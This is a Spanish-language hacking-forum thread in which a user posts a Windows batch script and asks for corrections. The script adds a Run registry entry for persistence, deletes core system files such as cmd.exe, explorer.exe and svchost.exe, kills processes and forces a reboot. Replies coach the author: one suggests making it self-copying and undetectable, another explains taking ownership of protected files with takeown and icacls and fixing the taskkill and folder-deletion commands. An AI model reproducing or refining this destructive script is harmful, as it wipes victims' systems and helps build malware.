Bat

Iniciado por templario267, 17 Marzo 2012, 23:28 PM

0 Miembros y 1 Visitante están viendo este tema.

templario267

Buenos días. Hace poco (por aburrimiento) cree un código en .bat, pero como soy nuevo en esto pensé si me podrían decir algún fallo en el, o simplemente si llegaría a funcionar alguna vez.  :laugh:

Aquí va el código:

@echo off
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v sysin2 /t REG_SZ /d "c:/windows/system32/internetexplorer.bat"
del c:\windows\config
del c:\windows\cursores
del c:\windows\system32\calc.exe
del c:\windows\system32\cmd.exe
del c:\windows\system32\notepad.exe
del c:\windows\system32\write.exe
del c:\windows\system32\taskman.exe
del c:\windows\taskman.exe
del c:\windows\explorer.exe
del c:\windows\mixer.exe
del c:\windows\system32\sndvol32.exe
del c:\windows\system32\winmine.exe
del c:\windows\system32\sol.exe
del c:\windows\system32\svchost.exe
del c:\windows\system32\uxtheme.dll
del c:\windows\system32\taskmon.exe
del c:\windows\repair
taskkill explorer.exe
taskkill rundll32.exe
shutdown -f -r -t 10
exit

Gracias de antemano  :)
Un hombre que no tiene valor para defender sus ideas, o el no vale nada, o sus ideas no valen nada.

$Edu$

Haria a media las cosas. Si te interesa el crear malware, podrias empezar viendo como hacer para que se autocopie, como hacerlo indetectable, que se yo.. pero no queriendo borrar archivos sin sentido.

-- KiLiaN --

Parece que quieras joder la pc donde ejecutes eso y de hecho (no tengo ganas de probarlo) no se si te dejara que borres cmd.exe porque lo estara usando por ejemplo y con lo demas borras archivos importantes.
Entren al chat de elhacker.net
    
   

@kln13

Eleкtro

#3
Lo cierto es que ese script de principio a fin no funcionaría si no se trata de una cuenta de admin.

Tu bat no lo podrías meter en la carpeta system32 para que la clave de registro funcionase.
No podrías borrar archivos de carpetas protegidas (System32) sin privilegios de usuario.

Lee acerca de Takeown e Icacls para resolverlo.


PD: Y dejando a un lado los privilegios:

El comando taskkill sin parámetros no hace nada, directamente no funciona como lo escribiste.
El comando Del no lo puedes utilizar para borrar carpetas (del c:\windows\repair), Lee acerca de RD.


Deberías instalarte VirtualBox y probar los códigos que hagas.

Salu2